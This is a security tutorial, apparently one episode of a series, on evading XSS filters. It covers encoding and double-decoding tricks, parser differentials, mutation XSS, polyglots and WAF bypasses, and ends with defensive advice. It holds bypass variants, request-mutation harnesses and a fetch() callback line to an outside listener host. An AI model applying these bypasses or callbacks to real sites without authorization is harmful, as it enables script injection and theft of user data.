By Episode 3, we were tracing tainted data through modern frontend code like a bloodhound: source, transform, sink, execution. But real targets rarely hand you a clean innerHTML sink with zero defenses. They give you “sanitization,” regex filters, brittle blacklist logic, WAF signatures, markdown renderers, HTML rewriters, and browser parsers that do not agree with the developer’s mental model. That gap between what defenders think they blocked and what the browser actually does is where filter evasion lives.
This episode is about exploiting that gap safely and systematically. We’ll look at how naive sanitizers fail, why parser differentials matter, how mutation XSS turns “sanitized” markup back into active code, how polyglot payloads survive uncertainty, and how to reason about WAF bypasses without devolving into payload cargo culting. The goal is not memorizing a zoo of strings. It’s learning how to generate bypasses from first principles.
Why filters fail: the browser is not a regex engine
Most broken XSS defenses fail for one of four reasons:
They sanitize the wrong context
- HTML escaping used for JavaScript
- URL validation used for HTML attributes
- Server-side filtering applied before client-side decoding
They normalize incompletely
- Single decoding pass
- Case-sensitive checks
- Failure to canonicalize whitespace, entities, or Unicode forms
They misunderstand parser behavior
- HTML parser repairs malformed markup
- Attribute parsing is more permissive than expected
- Browser mutation rewrites DOM in dangerous ways
They rely on blacklists
- Block <script> but allow event handlers
- Block onerror but allow srcdoc
- Block javascript: literally but miss encoded or transformed variants
A typical anti-pattern looks like this:
function weakSanitize(input) {
  return input
    .replace(/<script.*?>.*?<\/script>/gi, '')
    .replace(/onerror/gi, '')
    .replace(/onload/gi, '');
}
element.innerHTML = weakSanitize(userInput);
This filter assumes:
- script tags are the only execution path
- event handlers are known and enumerable
- the payload arrives in one stable textual form
- the browser won’t reinterpret malformed HTML
All of those assumptions are false.
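To make that concrete, here is a rough Python port of the filter above, assuming the same three patterns behave the same way under Python's `re` module. The name `weak_sanitize` and the inert `probe()` marker are illustrative only.

```python
import re

def weak_sanitize(text: str) -> str:
    """Python port of the weakSanitize() anti-pattern (same three patterns)."""
    text = re.sub(r"<script.*?>.*?</script>", "", text, flags=re.IGNORECASE)
    text = re.sub(r"onerror", "", text, flags=re.IGNORECASE)
    text = re.sub(r"onload", "", text, flags=re.IGNORECASE)
    return text

# 1. Single-pass removal can reassemble the very token it removes.
print(weak_sanitize("ononerrorerror"))  # -> onerror

# 2. "." does not match a newline by default, so a multi-line block survives.
print(repr(weak_sanitize("<script>\nprobe()\n</script>")))

# 3. Handlers that are not on the list pass straight through.
print(weak_sanitize("<input onfocus=probe()>"))
```

None of these three cases needs obfuscation. Each one falls out of an assumption the filter makes about its input.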
Build a bypass workflow, not a payload list
As we saw in earlier episodes, context is everything. For evasion, add a second model:
input form → app transforms → filter/WAF transforms → browser parse → DOM mutation → execution
When facing a filter, answer these questions in order:
1. What exactly is being filtered?
Compare:
- raw request
- reflected response
- live DOM after parsing
- DOM after client-side rewrites
Use Burp Repeater and browser DevTools together. For example:
curl -i 'https://target.example/search?q=%3Csvg%20onload%3Dconsole.log(1)%3E'
Then inspect:
- whether the server rewrites case
- whether entities are decoded once or twice
- whether the browser inserts quotes, closes tags, or moves nodes
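A small helper can take some of the eyeballing out of the request-versus-response comparison. The sketch below assumes you already have the response body as a string. `classify_reflection` is a hypothetical name, and it only recognizes the escaping styles produced by Python's own `html.escape` and `quote`, so a server that writes `&#39;` instead of `&#x27;` would land in the last bucket.

```python
import html
from urllib.parse import quote

def classify_reflection(probe: str, body: str) -> str:
    """Report how `probe` shows up in `body`, checking the most dangerous form first."""
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "html-escaped"
    if quote(probe, safe="") in body:
        return "url-encoded"
    return "absent-or-rewritten"

probe = '"><xsstest>'
print(classify_reflection(probe, '<p>"><xsstest></p>'))
print(classify_reflection(probe, "<p>&quot;&gt;&lt;xsstest&gt;</p>"))
```

An "absent-or-rewritten" result is the interesting one: it means some stage changed the probe in a way you have not modeled yet.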
2. Is the filter pre-parse or post-parse?
A server-side regex sees bytes. The browser sees tokens and nodes. If the filter strips <script> but allows malformed HTML that the browser repairs into executable DOM, you may have a parser differential.
3. Is there a decode or transform step after filtering?
Classic red flags:
- URL decoding after validation
- HTML entity decoding in a template helper
- markdown rendering after “safe text” checks
- client-side decodeURIComponent() before assignment to innerHTML
4. Can you switch execution primitives?
If <script> is blocked:
- event handlers
- SVG/MathML behaviors
- iframe srcdoc
- dangerous URL schemes where allowed
- DOM clobbering into existing code paths
- mutation-based reactivation
The right bypass is usually not “more obfuscation.” It’s “a different execution primitive.”
Canonicalization attacks: beat the filter’s view of the world
Canonicalization is the process of reducing multiple equivalent encodings to a single normalized form. Filters that inspect non-canonical input are fragile.
Mixed encoding and decoding mismatches
Suppose the application blocks javascript: in href values:
if (input.toLowerCase().includes('javascript:')) reject();
But later it decodes entities or percent-encoding before rendering. Then variants may survive validation and become active later.
Educational examples of transformations to test:
javascript:          (literal)
&#106;avascript:     (decimal HTML entity for "j")
java%73cript:        (percent-encoded "s")
java&#x73;cript:     (hex HTML entity for "s")
The point is not that every modern browser will execute every variant in every context. The point is to test whether:
- the filter inspects one representation
- a later stage transforms it into another
- the browser consumes the transformed version
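Those three conditions can be reproduced offline. The sketch below mirrors the substring check from earlier as `naive_check`, then runs it again on a canonicalized copy. `canonicalize` is a hypothetical helper, and it assumes the later stages of the pipeline apply percent-decoding and HTML entity decoding. It also drops ASCII tab, LF, and CR, which URL parsers following the WHATWG rules remove from the input.

```python
import html
from urllib.parse import unquote

def naive_check(value: str) -> bool:
    """Mirror of the filter above: True means the value would be rejected."""
    return "javascript:" in value.lower()

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode percent-encoding and HTML entities until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    # Drop ASCII tab/LF/CR, which URL parsers remove before reading the scheme.
    return value.translate({9: None, 10: None, 13: None}).lower()

for candidate in ["javascript:", "java%73cript:", "&#106;avascript:", "java\tscript:"]:
    print(repr(candidate), naive_check(candidate), naive_check(canonicalize(candidate)))
```

Any row where the two booleans differ marks a representation the filter does not see but a later stage might restore.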
Whitespace and control character confusion
Weak filters often look for exact substrings like onerror= or javascript:. Browser tokenization may tolerate surprising separators or normalization.
Probe for:
- tabs
- newlines
- carriage returns
- form feeds
- multiple spaces
- mixed case
Example fuzzing idea:
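# educational fuzz helper: insert each separator at every interior position
tokens = ["onload", "onerror", "javascript:"]
separators = [" ", "\t", "\n", "\r", "\f"]
for token in tokens:
    for sep in separators:
        for i in range(1, len(token)):
            # repr() keeps control characters visible in the output
            print(repr(token[:i] + sep + token[i:]))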
Again, the value is not a magic string. It’s observing whether the target canonicalizes before checking.
Double decoding bugs
A common anti-pattern:
const input = req.query.q; // %253Csvg...%253E
if (input.includes('<')) reject(); // sees no literal <
const decoded = decodeURIComponent(input);
element.innerHTML = decoded;
Test for this with staged encoding. If one decode happens server-side and another client-side, payloads can emerge only at the sink.
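One way to produce staged encodings is to wrap a benign probe in successive layers of percent-encoding and note which layer count first yields markup at the sink. This is a minimal sketch. `staged` and `decode_rounds` are names invented here, and `<svg` is only an inert fragment.

```python
from urllib.parse import quote, unquote

def staged(probe: str, layers: int) -> str:
    """Percent-encode `probe` `layers` times, encoding every reserved character."""
    for _ in range(layers):
        probe = quote(probe, safe="")
    return probe

def decode_rounds(value: str, limit: int = 10) -> int:
    """Count how many percent-decoding passes it takes for `value` to stabilize."""
    rounds = 0
    while rounds < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return rounds

for n in range(4):
    print(n, staged("<svg", n))
```

If the two-layer probe reaches the DOM as a literal `<` while the one-layer probe is rejected, the pipeline is decoding once more after its check.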
Parser confusion: the browser repairs your exploit for you
HTML parsers are designed to recover from broken markup. Filters are often designed as if malformed input just stays malformed.
Attribute breakout via quote assumptions
If a filter only escapes double quotes but not single quotes, backticks, or unquoted attribute edge cases, you may still break context depending on how the template is built.
Example vulnerable template:
<div data-name='USER_INPUT'></div>
Weak defense:
input = input.replace(/"/g, '&quot;');
That does nothing for single-quoted context.
A safe way to test behavior without immediate execution is to inject benign markers and inspect the repaired DOM:
' data-probe='x
Then see whether a new attribute appears in DevTools. Once you confirm breakout, you can move to an execution primitive appropriate for that context.
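When you are checking many responses, the same confirmation can be approximated outside the browser. The sketch below uses Python's standard `html.parser`, which is not a browser parser and will disagree with one on malformed input, so treat a hit as a lead to verify in DevTools. `ProbeFinder` and `breakout_confirmed` are hypothetical names.

```python
from html.parser import HTMLParser

class ProbeFinder(HTMLParser):
    """Collect start tags that carry a given marker attribute."""

    def __init__(self, marker: str):
        super().__init__()
        self.marker = marker
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if any(name == self.marker for name, _ in attrs):
            self.hits.append((tag, dict(attrs)))

def breakout_confirmed(response_html: str, marker: str = "data-probe") -> bool:
    """True if the marker was parsed as its own attribute rather than as a value."""
    finder = ProbeFinder(marker)
    finder.feed(response_html)
    finder.close()
    return bool(finder.hits)

template = "<div data-name='{}'></div>"
probe = "' data-probe='x"
print(breakout_confirmed(template.format(probe)))                        # quote left intact
print(breakout_confirmed(template.format(probe.replace("'", "&#39;"))))  # quote encoded
```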
Tag balancing and browser auto-closing
Applications often strip > or specific tags but leave enough structure for the parser to reconstruct dangerous markup.
For example, if a markdown or HTML filter allows fragments like this through:
<svg
and later concatenation or parser repair completes the node, you may get executable elements despite incomplete original input.
Foreign content: SVG and MathML
Some sanitizers focus on HTML tags and forget that browsers parse SVG and MathML with their own rules. Historically, this has been fertile ground for bypasses and mutation XSS.
Even when direct script execution is blocked, foreign-content parsing can:
- create unexpected namespaces
- preserve attributes differently
- mutate when inserted into the DOM
- interact badly with sanitizers that serialize and reparse markup
Mutation XSS: sanitized now, dangerous later
Mutation XSS, or mXSS, happens when markup is sanitized into a form that appears inert, but browser parsing or DOM mutation transforms it into executable markup later.
This matters because many sanitizers work like this:
- parse untrusted HTML
- remove dangerous nodes/attributes
- serialize back to a string
- assign that string to innerHTML somewhere else
That final reparse can change semantics.
Why mXSS happens
Different stages may use:
- different parsers
- different namespaces
- different serialization rules
- different DOM repair logic
A sanitizer may inspect one DOM tree, but the browser eventually executes another.
Practical testing pattern
When you suspect mXSS:
- Put the candidate payload through the application normally.
- Capture the stored/rendered HTML.
- Reinsert that exact output into a local test harness.
- Compare:
  - original input
  - sanitizer output
  - final DOM after browser parse
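For the comparison step, a plain text diff between stages is often enough to spot a mutation. The sketch below uses `difflib` from the standard library. The two sample strings are hypothetical captures, and in practice you would paste what you copied from the application and from DevTools.

```python
import difflib

def stage_diff(before: str, after: str, before_name: str, after_name: str) -> str:
    """Return a unified diff between two stages of the same markup."""
    lines = difflib.unified_diff(
        before.splitlines(), after.splitlines(),
        fromfile=before_name, tofile=after_name, lineterm="",
    )
    return "\n".join(lines)

# Hypothetical captures for illustration only.
sanitizer_output = "<p>hello<b>world</p>"
final_dom = "<p>hello<b>world</b></p>"
print(stage_diff(sanitizer_output, final_dom, "sanitizer output", "final DOM"))
```

An empty diff means the reparse was stable for that sample. Anything else deserves a closer look at which stage introduced the change.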
Minimal harness:
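<!doctype html>
<html>
  <body>
    <div id="app"></div>
    <script>
      // Escape any backticks, "${" sequences, or closing script tags in the
      // pasted output first, or the template literal or script block ends early.
      const sanitizedOutput = `PASTE_OUTPUT_HERE`;
      const app = document.getElementById('app');
      app.innerHTML = sanitizedOutput;
      // Serialized DOM after the browser's reparse, for comparison with the input.
      console.log(app.innerHTML);
    </script>
  </body>
</html>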
If the browser mutates the markup into something more dangerous than the sanitizer intended, you’ve got a strong lead.
What to look for
Look for:
- attribute reordering or quote insertion
- namespace changes in SVG/MathML
- unexpected node creation
- repaired malformed tags
- text becoming markup after decode/reparse chains
Modern hardened sanitizers have reduced many historical mXSS cases, but bespoke sanitizers and legacy libraries still fail here.
Polyglots: payloads for uncertain contexts
Polyglot payloads are designed to remain syntactically meaningful across multiple parsing contexts. They’re useful when:
- the exact sink is unclear
- your input may land in HTML, attribute, JS string, or URL contexts depending on route or template branch
- you need a discovery probe that survives transformations
A polyglot is not a universal instant-win string. It’s a reconnaissance tool and sometimes a bypass aid.
What makes a good polyglot
A useful polyglot:
- breaks out of multiple likely contexts
- degrades gracefully if one context fails
- includes a low-noise execution or callback primitive
- is short enough to survive truncation and storage quirks
Example strategy, not magic
Instead of memorizing one famous payload, think in layers:
- close current context if possible
- open a new executable context
- leave trailing characters harmless
For example, if your input might appear in:
- HTML text
- quoted attribute
- script string
you want a prefix that can terminate at least some of those contexts, then fall into a new tag or handler.
A safe discovery-oriented approach is to use a callback marker rather than alert():
fetch('https://listener.example/xss?probe=polyglot4')
Then embed that callback in a context-appropriate primitive after you learn where breakout occurs.
Polyglots and WAFs
Polyglots often trigger signatures because they contain many suspicious delimiters. On hardened targets, a smaller context-specific bypass usually beats a giant “works everywhere” string.
Use polyglots to map uncertainty. Use precision payloads to land the exploit.
WAF bypass tactics: think like a normalizer
WAFs usually inspect HTTP requests, not final browser DOM. That means they lose whenever:
- dangerous semantics emerge only after app-side transforms
- the payload is split across parameters or requests
- the browser repairs malformed input into executable markup
- client-side code assembles the final sink value
Common WAF blind spots
Parameter fragmentation
If a frontend concatenates multiple values into one sink, but the WAF inspects parameters independently, execution can emerge only after assembly.
Example pattern:
const html = part1 + part2 + part3;
target.innerHTML = html;
You may see this in template fragments, markdown options, or widget configs.
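The blind spot is easy to model. In the sketch below, `SIGNATURE` stands in for a WAF rule and `waf_allows` for per-parameter inspection. Both are assumptions made for illustration, and the "payload" is just the inert `<xsstest>` marker.

```python
import re

SIGNATURE = re.compile(r"<xsstest>", re.IGNORECASE)  # stand-in for a WAF rule

def waf_allows(params: dict) -> bool:
    """Per-parameter inspection: allow the request if no single value matches."""
    return not any(SIGNATURE.search(value) for value in params.values())

params = {"part1": "<xss", "part2": "te", "part3": "st>"}
assembled = params["part1"] + params["part2"] + params["part3"]

print(waf_allows(params))                 # each fragment looks harmless
print(bool(SIGNATURE.search(assembled)))  # the assembled value matches
```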
JSON and nested structures
WAF rules tuned for URL parameters often miss payloads hidden in:
- JSON bodies
- arrays
- nested object fields
- GraphQL variables
Use realistic content types:
curl -i https://target.example/api/profile \
-H 'Content-Type: application/json' \
--data '{"bio":"<probe>"}'
Then observe how that field is rendered later.
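Before placing probes in a large JSON body, it helps to list every string field that could reach a renderer. The walker below is a minimal sketch. `string_leaf_paths` and its `$.a[0].b` path notation are choices made here, not a standard.

```python
import json

def string_leaf_paths(node, path="$"):
    """Yield (path, value) for every string leaf in a decoded JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from string_leaf_paths(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from string_leaf_paths(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node

body = json.loads('{"bio": "hi", "links": [{"label": "site", "rank": 1}], "tags": ["a"]}')
for path, value in string_leaf_paths(body):
    print(path, repr(value))
```

Tagging each probe with its path makes it much easier to tell later which field a given reflection came from.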
Alternate request paths
A WAF may protect the main web app but not:
- API subdomains
- upload processors
- preview endpoints
- websocket/bootstrap APIs
- mobile-specific endpoints
The XSS sink is often downstream from the protected edge.
Signature evasion versus semantic evasion
There are two very different ways to bypass a WAF:
Signature evasion
- alter bytes so the WAF misses a known pattern
- case changes, encoding, fragmentation
Semantic evasion
- use a different browser feature than the WAF expects
- no <script>, no obvious handler, no literal dangerous scheme
Semantic evasion is usually more reliable because it survives normalization. If the WAF blocks <script>, don’t spend all day trying to smuggle <script>. Ask what other executable semantics the browser accepts in that sink.
Differential analysis: app, WAF, browser
The cleanest way to study bypasses is differential testing.
Step 1: establish a baseline probe set
Use harmless probes first:
xsstest123
"><xsstest>
' data-probe='1
<svg
javascript:
Step 2: compare responses through different paths
- direct app response
- response behind CDN/WAF
- mobile/API path
- stored render path
- live DOM after framework hydration
Step 3: automate mutations
A tiny mutation harness can save hours:
import itertools
import requests

base = "https://target.example/search"
parts = ["<svg", "<img", "onload", "onerror", "srcdoc", "javascript:"]
encoders = [
    lambda s: s,                        # unchanged
    lambda s: s.upper(),                # case variation
    lambda s: s.replace("a", "&#97;"),  # HTML entity for "a"
]
for p, e in itertools.product(parts, encoders):
    candidate = e(p)
    r = requests.get(base, params={"q": candidate}, timeout=10)
    print(candidate, r.status_code, len(r.text))
This won’t “find XSS” by itself. It highlights normalization differences, blocking thresholds, and weird reflections worth manual follow-up.
Real-world anti-patterns worth hunting
Weak markdown sanitization
Pipeline:
- user markdown
- markdown renderer
- HTML allowlist
- final innerHTML
Problems:
- raw HTML partially allowed
- links/images insufficiently validated
- post-render rewrites introduce dangerous attributes
- code fences or embedded HTML mutate on reparse
“Strip tags” then trust output
Classic bug:
input = input.replace(/<[^>]+>/g, '');
This is not sanitization. It can be bypassed by malformed markup, entity tricks, parser repair, and anything that becomes markup later through decoding or concatenation.
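Two of those failure modes show up with harmless input. The sketch below ports the regex to Python as `strip_tags` (an illustrative name) and assumes a later stage decodes HTML entities, modeled here with `html.unescape`.

```python
import html
import re

def strip_tags(text: str) -> str:
    """Python port of the replace(/<[^>]+>/g, '') anti-pattern."""
    return re.sub(r"<[^>]+>", "", text)

print(strip_tags("<b>bold</b>"))              # well-formed tags are removed
print(repr(strip_tags("<svg data-probe=1")))  # no closing ">", so nothing matches
encoded = strip_tags("&lt;xsstest&gt;")       # no literal "<" to strip
print(html.unescape(encoded))                 # a later decode recreates the tag
```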
Client-side sanitization only
If the server stores raw input and the browser sanitizes on render, any alternate render path, legacy client, or admin tool may become exploitable.
Homegrown allowlists
Developers allow “safe tags” but forget:
- dangerous attributes
- namespace-specific behavior
- URL-valued attributes
- srcdoc
- custom elements interacting with framework code
- DOM clobbering side effects
Defenses that actually hold up
Evasion exists because defenses are often ad hoc. The answer is not a bigger blacklist.
1. Eliminate dangerous sinks where possible
Prefer:
- textContent
- innerText
- safe attribute setters for known-safe attributes
- framework auto-escaping paths
Avoid raw HTML insertion unless absolutely necessary.
2. Use context-correct output encoding
Encode for the exact sink:
- HTML text
- HTML attribute
- JavaScript string
- CSS
- URL
One encoder does not fit all contexts.
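To see how different the right answer is per context, here is a sketch of four encoders built only from the Python standard library. The function names are hypothetical, CSS is left out, and a real project should prefer its framework's or templating engine's own encoders over hand-rolled ones like these.

```python
import html
import json
from urllib.parse import quote

def for_html_text(value: str) -> str:
    return html.escape(value, quote=False)

def for_html_attribute(value: str) -> str:
    # Assumes the template always wraps the attribute value in quotes.
    return html.escape(value, quote=True)

def for_js_string(value: str) -> str:
    # json.dumps yields a quoted string literal; escaping "<", ">" and "&"
    # keeps a closing script tag in the data from ending an inline script early.
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")

def for_url_component(value: str) -> str:
    return quote(value, safe="")

sample = "</script><b title='x'>&"
for encoder in (for_html_text, for_html_attribute, for_js_string, for_url_component):
    print(f"{encoder.__name__:20} {encoder(sample)}")
```

The same input comes out four different ways, which is the point: output that is safe in one context can still be active in another.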
3. Sanitize with a mature HTML sanitizer
Use a well-maintained sanitizer with:
- secure defaults
- namespace-aware parsing
- active patching for mXSS and browser quirks
Then keep it updated. Old sanitizer versions are frequent bypass targets.
4. Normalize before validation
If you must validate structured input:
- decode once in a controlled place
- normalize case and Unicode where relevant
- reject ambiguous forms
- avoid multi-stage decode pipelines
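For a URL-valued field, those steps might look like the sketch below. It canonicalizes once, then applies an allowlist instead of searching for bad schemes. `ALLOWED_SCHEMES` and `is_allowed_href` are assumptions for illustration, and rejecting relative URLs is a simplification that a real application may not want.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumption: adjust per application
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))

def is_allowed_href(value: str) -> bool:
    """Canonicalize once, then allow only absolute URLs with an allowlisted scheme."""
    # Mirror browser URL parsing: drop tab/LF/CR anywhere, trim control chars and spaces.
    cleaned = value.translate({9: None, 10: None, 13: None}).strip(C0_AND_SPACE)
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False
    return scheme in ALLOWED_SCHEMES

for candidate in ["https://example.com/a", "JaVaScRiPt:probe", "java\tscript:probe", "/relative"]:
    print(repr(candidate), is_allowed_href(candidate))
```

Because the check runs on the canonical form and names what is allowed, case changes and stray control characters stop mattering.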
5. Enforce browser-side mitigations
We’ll go deep on these in a later episode, but the high-level stack is:
- strong CSP
- Trusted Types
- safe templating
- no inline event handlers
- no string-to-code APIs
These controls don’t replace sanitization, but they dramatically reduce exploitability when sanitization fails.
6. Test sanitizers against browser reality
Unit-test with:
- hostile HTML samples
- serialization/reparse cycles
- SVG/MathML cases
- framework hydration paths
- stored and reflected render paths
If your sanitizer only passes string-based tests and never browser DOM tests, you’re flying blind.
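One cheap string-level check that still catches real problems is stability: running the sanitizer on its own output should change nothing. The sketch below is not a substitute for browser DOM tests, and `toy_sanitize` is a deliberately weak stand-in for whatever sanitizer you are actually testing.

```python
import re
from typing import Callable, Iterable, List, Tuple

def unstable_samples(sanitize: Callable[[str], str],
                     samples: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (sample, first_pass, second_pass) wherever a second pass changes the output."""
    failures = []
    for sample in samples:
        first = sanitize(sample)
        second = sanitize(first)
        if first != second:
            failures.append((sample, first, second))
    return failures

# Toy sanitizer standing in for the code under test (hypothetical).
def toy_sanitize(text: str) -> str:
    return re.sub(r"onerror", "", text, flags=re.IGNORECASE)

for failure in unstable_samples(toy_sanitize, ["plain text", "ononerrorerror"]):
    print(failure)
```

A sample that only settles on the second pass means the first pass emitted something the sanitizer itself would reject, which is the same shape of bug as a dangerous serialize-and-reparse cycle.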
A practical lab mindset
When you hit a filtered target, don’t ask, “What payload bypasses this WAF?”
Ask:
- What representation does the filter inspect?
- What transformations happen after inspection?
- What parser will ultimately interpret the data?
- Can I shift to a different execution primitive?
- Can browser mutation reactivate something the sanitizer thought was inert?
That mindset scales far better than memorizing 500 payloads from a gist.
A good engagement notebook for this episode’s techniques should track:
Input sent:
Observed server reflection:
Observed DOM after parse:
Observed DOM after client rewrite:
Blocked by WAF?:
Normalized/decoded?:
Potential alternate primitive:
Stored path differs?:
That structure turns “try random payloads” into disciplined exploit development.
Closing thoughts
Filter evasion is not wizardry. It’s just exploiting mismatches: between bytes and tokens, strings and DOM nodes, validation and canonicalization, sanitizer output and browser mutation, WAF signatures and actual execution semantics. The strongest attackers are not the ones with the biggest payload list. They’re the ones who can explain exactly why a bypass works.
In the next episode, we’ll assume you’ve landed code execution and move to what matters most in a real assessment: impact. We’ll chain XSS into account takeover, privileged action abuse, token theft, and sensitive data exfiltration—the difference between “it pops” and “this is business-critical.”